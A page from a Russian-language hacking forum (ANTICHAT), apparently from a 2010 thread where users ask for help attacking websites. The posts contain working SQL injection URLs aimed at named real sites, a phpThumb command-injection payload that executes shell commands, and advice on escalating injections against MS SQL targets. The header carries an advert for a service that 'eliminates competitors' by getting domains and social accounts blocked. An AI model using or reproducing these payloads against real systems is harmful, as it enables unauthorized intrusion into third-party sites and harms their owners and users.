УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 1480 из 2438

1480

Опции темы

Поиск в этой теме

Опции просмотра

#14791

18.08.2010, 19:46

kfor

Участник форума

Регистрация: 01.09.2005

Сообщений: 194

Провел на форуме:
818095

Репутация: 34

Отправить сообщение для kfor с помощью ICQ

Цитата:

Сообщение от InfectedM

InfectedM said:
http://www.lascos.com.ua/index.php?id=-1+union+select+concat_ws(0x3a,version())--
почему вот тут кидает на главную, что можно сделать?
http://www.lascos.com.ua/index.php?id=-1+union+select+concat_ws(0x3a,SCHEMA_NAME)+from+in formation_schema.SCHEMATA+--+

Короче это угар

Конечно, но благодаря ошибки и получасется вывод.

Вот так ты сможешь провдить инъекцию =)

http://www.lascos.com.ua/index.php?id=-1+union+select+concat_ws(0x3a,version(),SCHEMA_NAM E)+from+information_schema.SCHEMATA+LIMIT+1,2+--+

#14792

18.08.2010, 22:49

Lilo

Moderator - Level 7

Регистрация: 10.03.2009

Сообщений: 1,013

Провел на форуме:
6183433

Репутация: 1521

http://www.bmaccess.net/webtool/phpThumb/phpThumb.php?src=http://wwwwwwww/&ws=320&hs=240&f=png

code inj

обьясните в кратце как использовать

#14793

18.08.2010, 23:00

ZARO

Познающий

Регистрация: 17.04.2009

Сообщений: 59

Провел на форуме:
401944

Репутация: 37

Отправить сообщение для ZARO с помощью ICQ

Цитата:

Сообщение от Lilo

Lilo said:
http://www.bmaccess.net/webtool/phpThumb/phpThumb.php?src=http://wwwwwwww/&ws=320&hs=240&f=png
code inj
обьясните в кратце как использовать

http://www.bmaccess.net/webtool/phpThumb/phpThumb.php?src=/home/site.com/public_html/kartinka.jpg&fltr[]=blur|5%20-quality%2075%20-interlace%20line%20%22/home/site.com/public_html/kartinka.jpg%22%20jpeg:%22/home/site.com/public_html/kartinka.jpg%22%20;%20ls%20-la%20;&phpThumbDebug=9

#14794

18.08.2010, 23:50

Koren

Новичок

Регистрация: 11.07.2009

Сообщений: 3

Провел на форуме:
19069

Репутация: 0

это может быть уязвимо?

Microsoft OLE DB Provider for SQL Server error '80040e21'

Invalid character value for cast specification.

/view_lesson_plan.asp, line 21

если по этой ошибке трудно сказать оставлю линк

и ещё одна

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Error converting data type varchar to int.

/scammer.asp, line 32

#14795

19.08.2010, 01:00

kfor

Участник форума

Регистрация: 01.09.2005

Сообщений: 194

Провел на форуме:
818095

Репутация: 34

Цитата:

Сообщение от Koren

Koren said:
это может быть уязвимо?
Microsoft OLE DB Provider for SQL Server error '80040e21'
Invalid character value for cast specification.
/view_lesson_plan.asp, line 21
если по этой ошибке трудно сказать оставлю линк
и ещё одна
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Error converting data type varchar to int.
/scammer.asp, line 32

А ошибка то просто валится или ты чё то в параметр пихаешь?

#14796

19.08.2010, 01:08

Koren

Новичок

Регистрация: 11.07.2009

Сообщений: 3

Провел на форуме:
19069

Репутация: 0

Цитата:

Сообщение от kfor

kfor said:
А ошибка то просто валится или ты чё то в параметр пихаешь?

в параметр asp?id=674 подставляем '

#14797

19.08.2010, 01:14

kfor

Участник форума

Регистрация: 01.09.2005

Сообщений: 194

Провел на форуме:
818095

Репутация: 34

Цитата:

Сообщение от Koren

Koren said:
в параметр asp?id=674 подставляем '

Попробуй логическое выражение.. Ваапще наврено будет скуля но тока этовинда там другой синтаксис если что..

#14798

19.08.2010, 01:34

Koren

Новичок

Регистрация: 11.07.2009

Сообщений: 3

Провел на форуме:
19069

Репутация: 0

Цитата:

Сообщение от kfor

kfor said:
Попробуй логическое выражение.. Ваапще наврено будет скуля но тока этовинда
там другой синтаксис если что..

так в том то и дело что пробывал логическое)) ничего не меняется

а с виндой как быть?)

#14799

19.08.2010, 10:12

kfor

Участник форума

Регистрация: 01.09.2005

Сообщений: 194

Провел на форуме:
818095

Репутация: 34

Цитата:

Сообщение от Koren

Koren said:
так в том то и дело что пробывал логическое)) ничего не меняется
а с виндой как быть?)

Ну всмысле там MS SQL. Где то была статья , даже мож и на ачате, про проведение инъекции. Ну гугл точно найдёт

#14800

19.08.2010, 12:36

Lilo

Moderator - Level 7

Регистрация: 10.03.2009

Сообщений: 1,013

Провел на форуме:
6183433

Репутация: 1521

http://clustercenter.org/login.php?return=/index/month/&category=1'

просто ошибка?

не крутится скуля такая?

пробывал у меня не вышло

Страница 1480 из 2438

1480

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход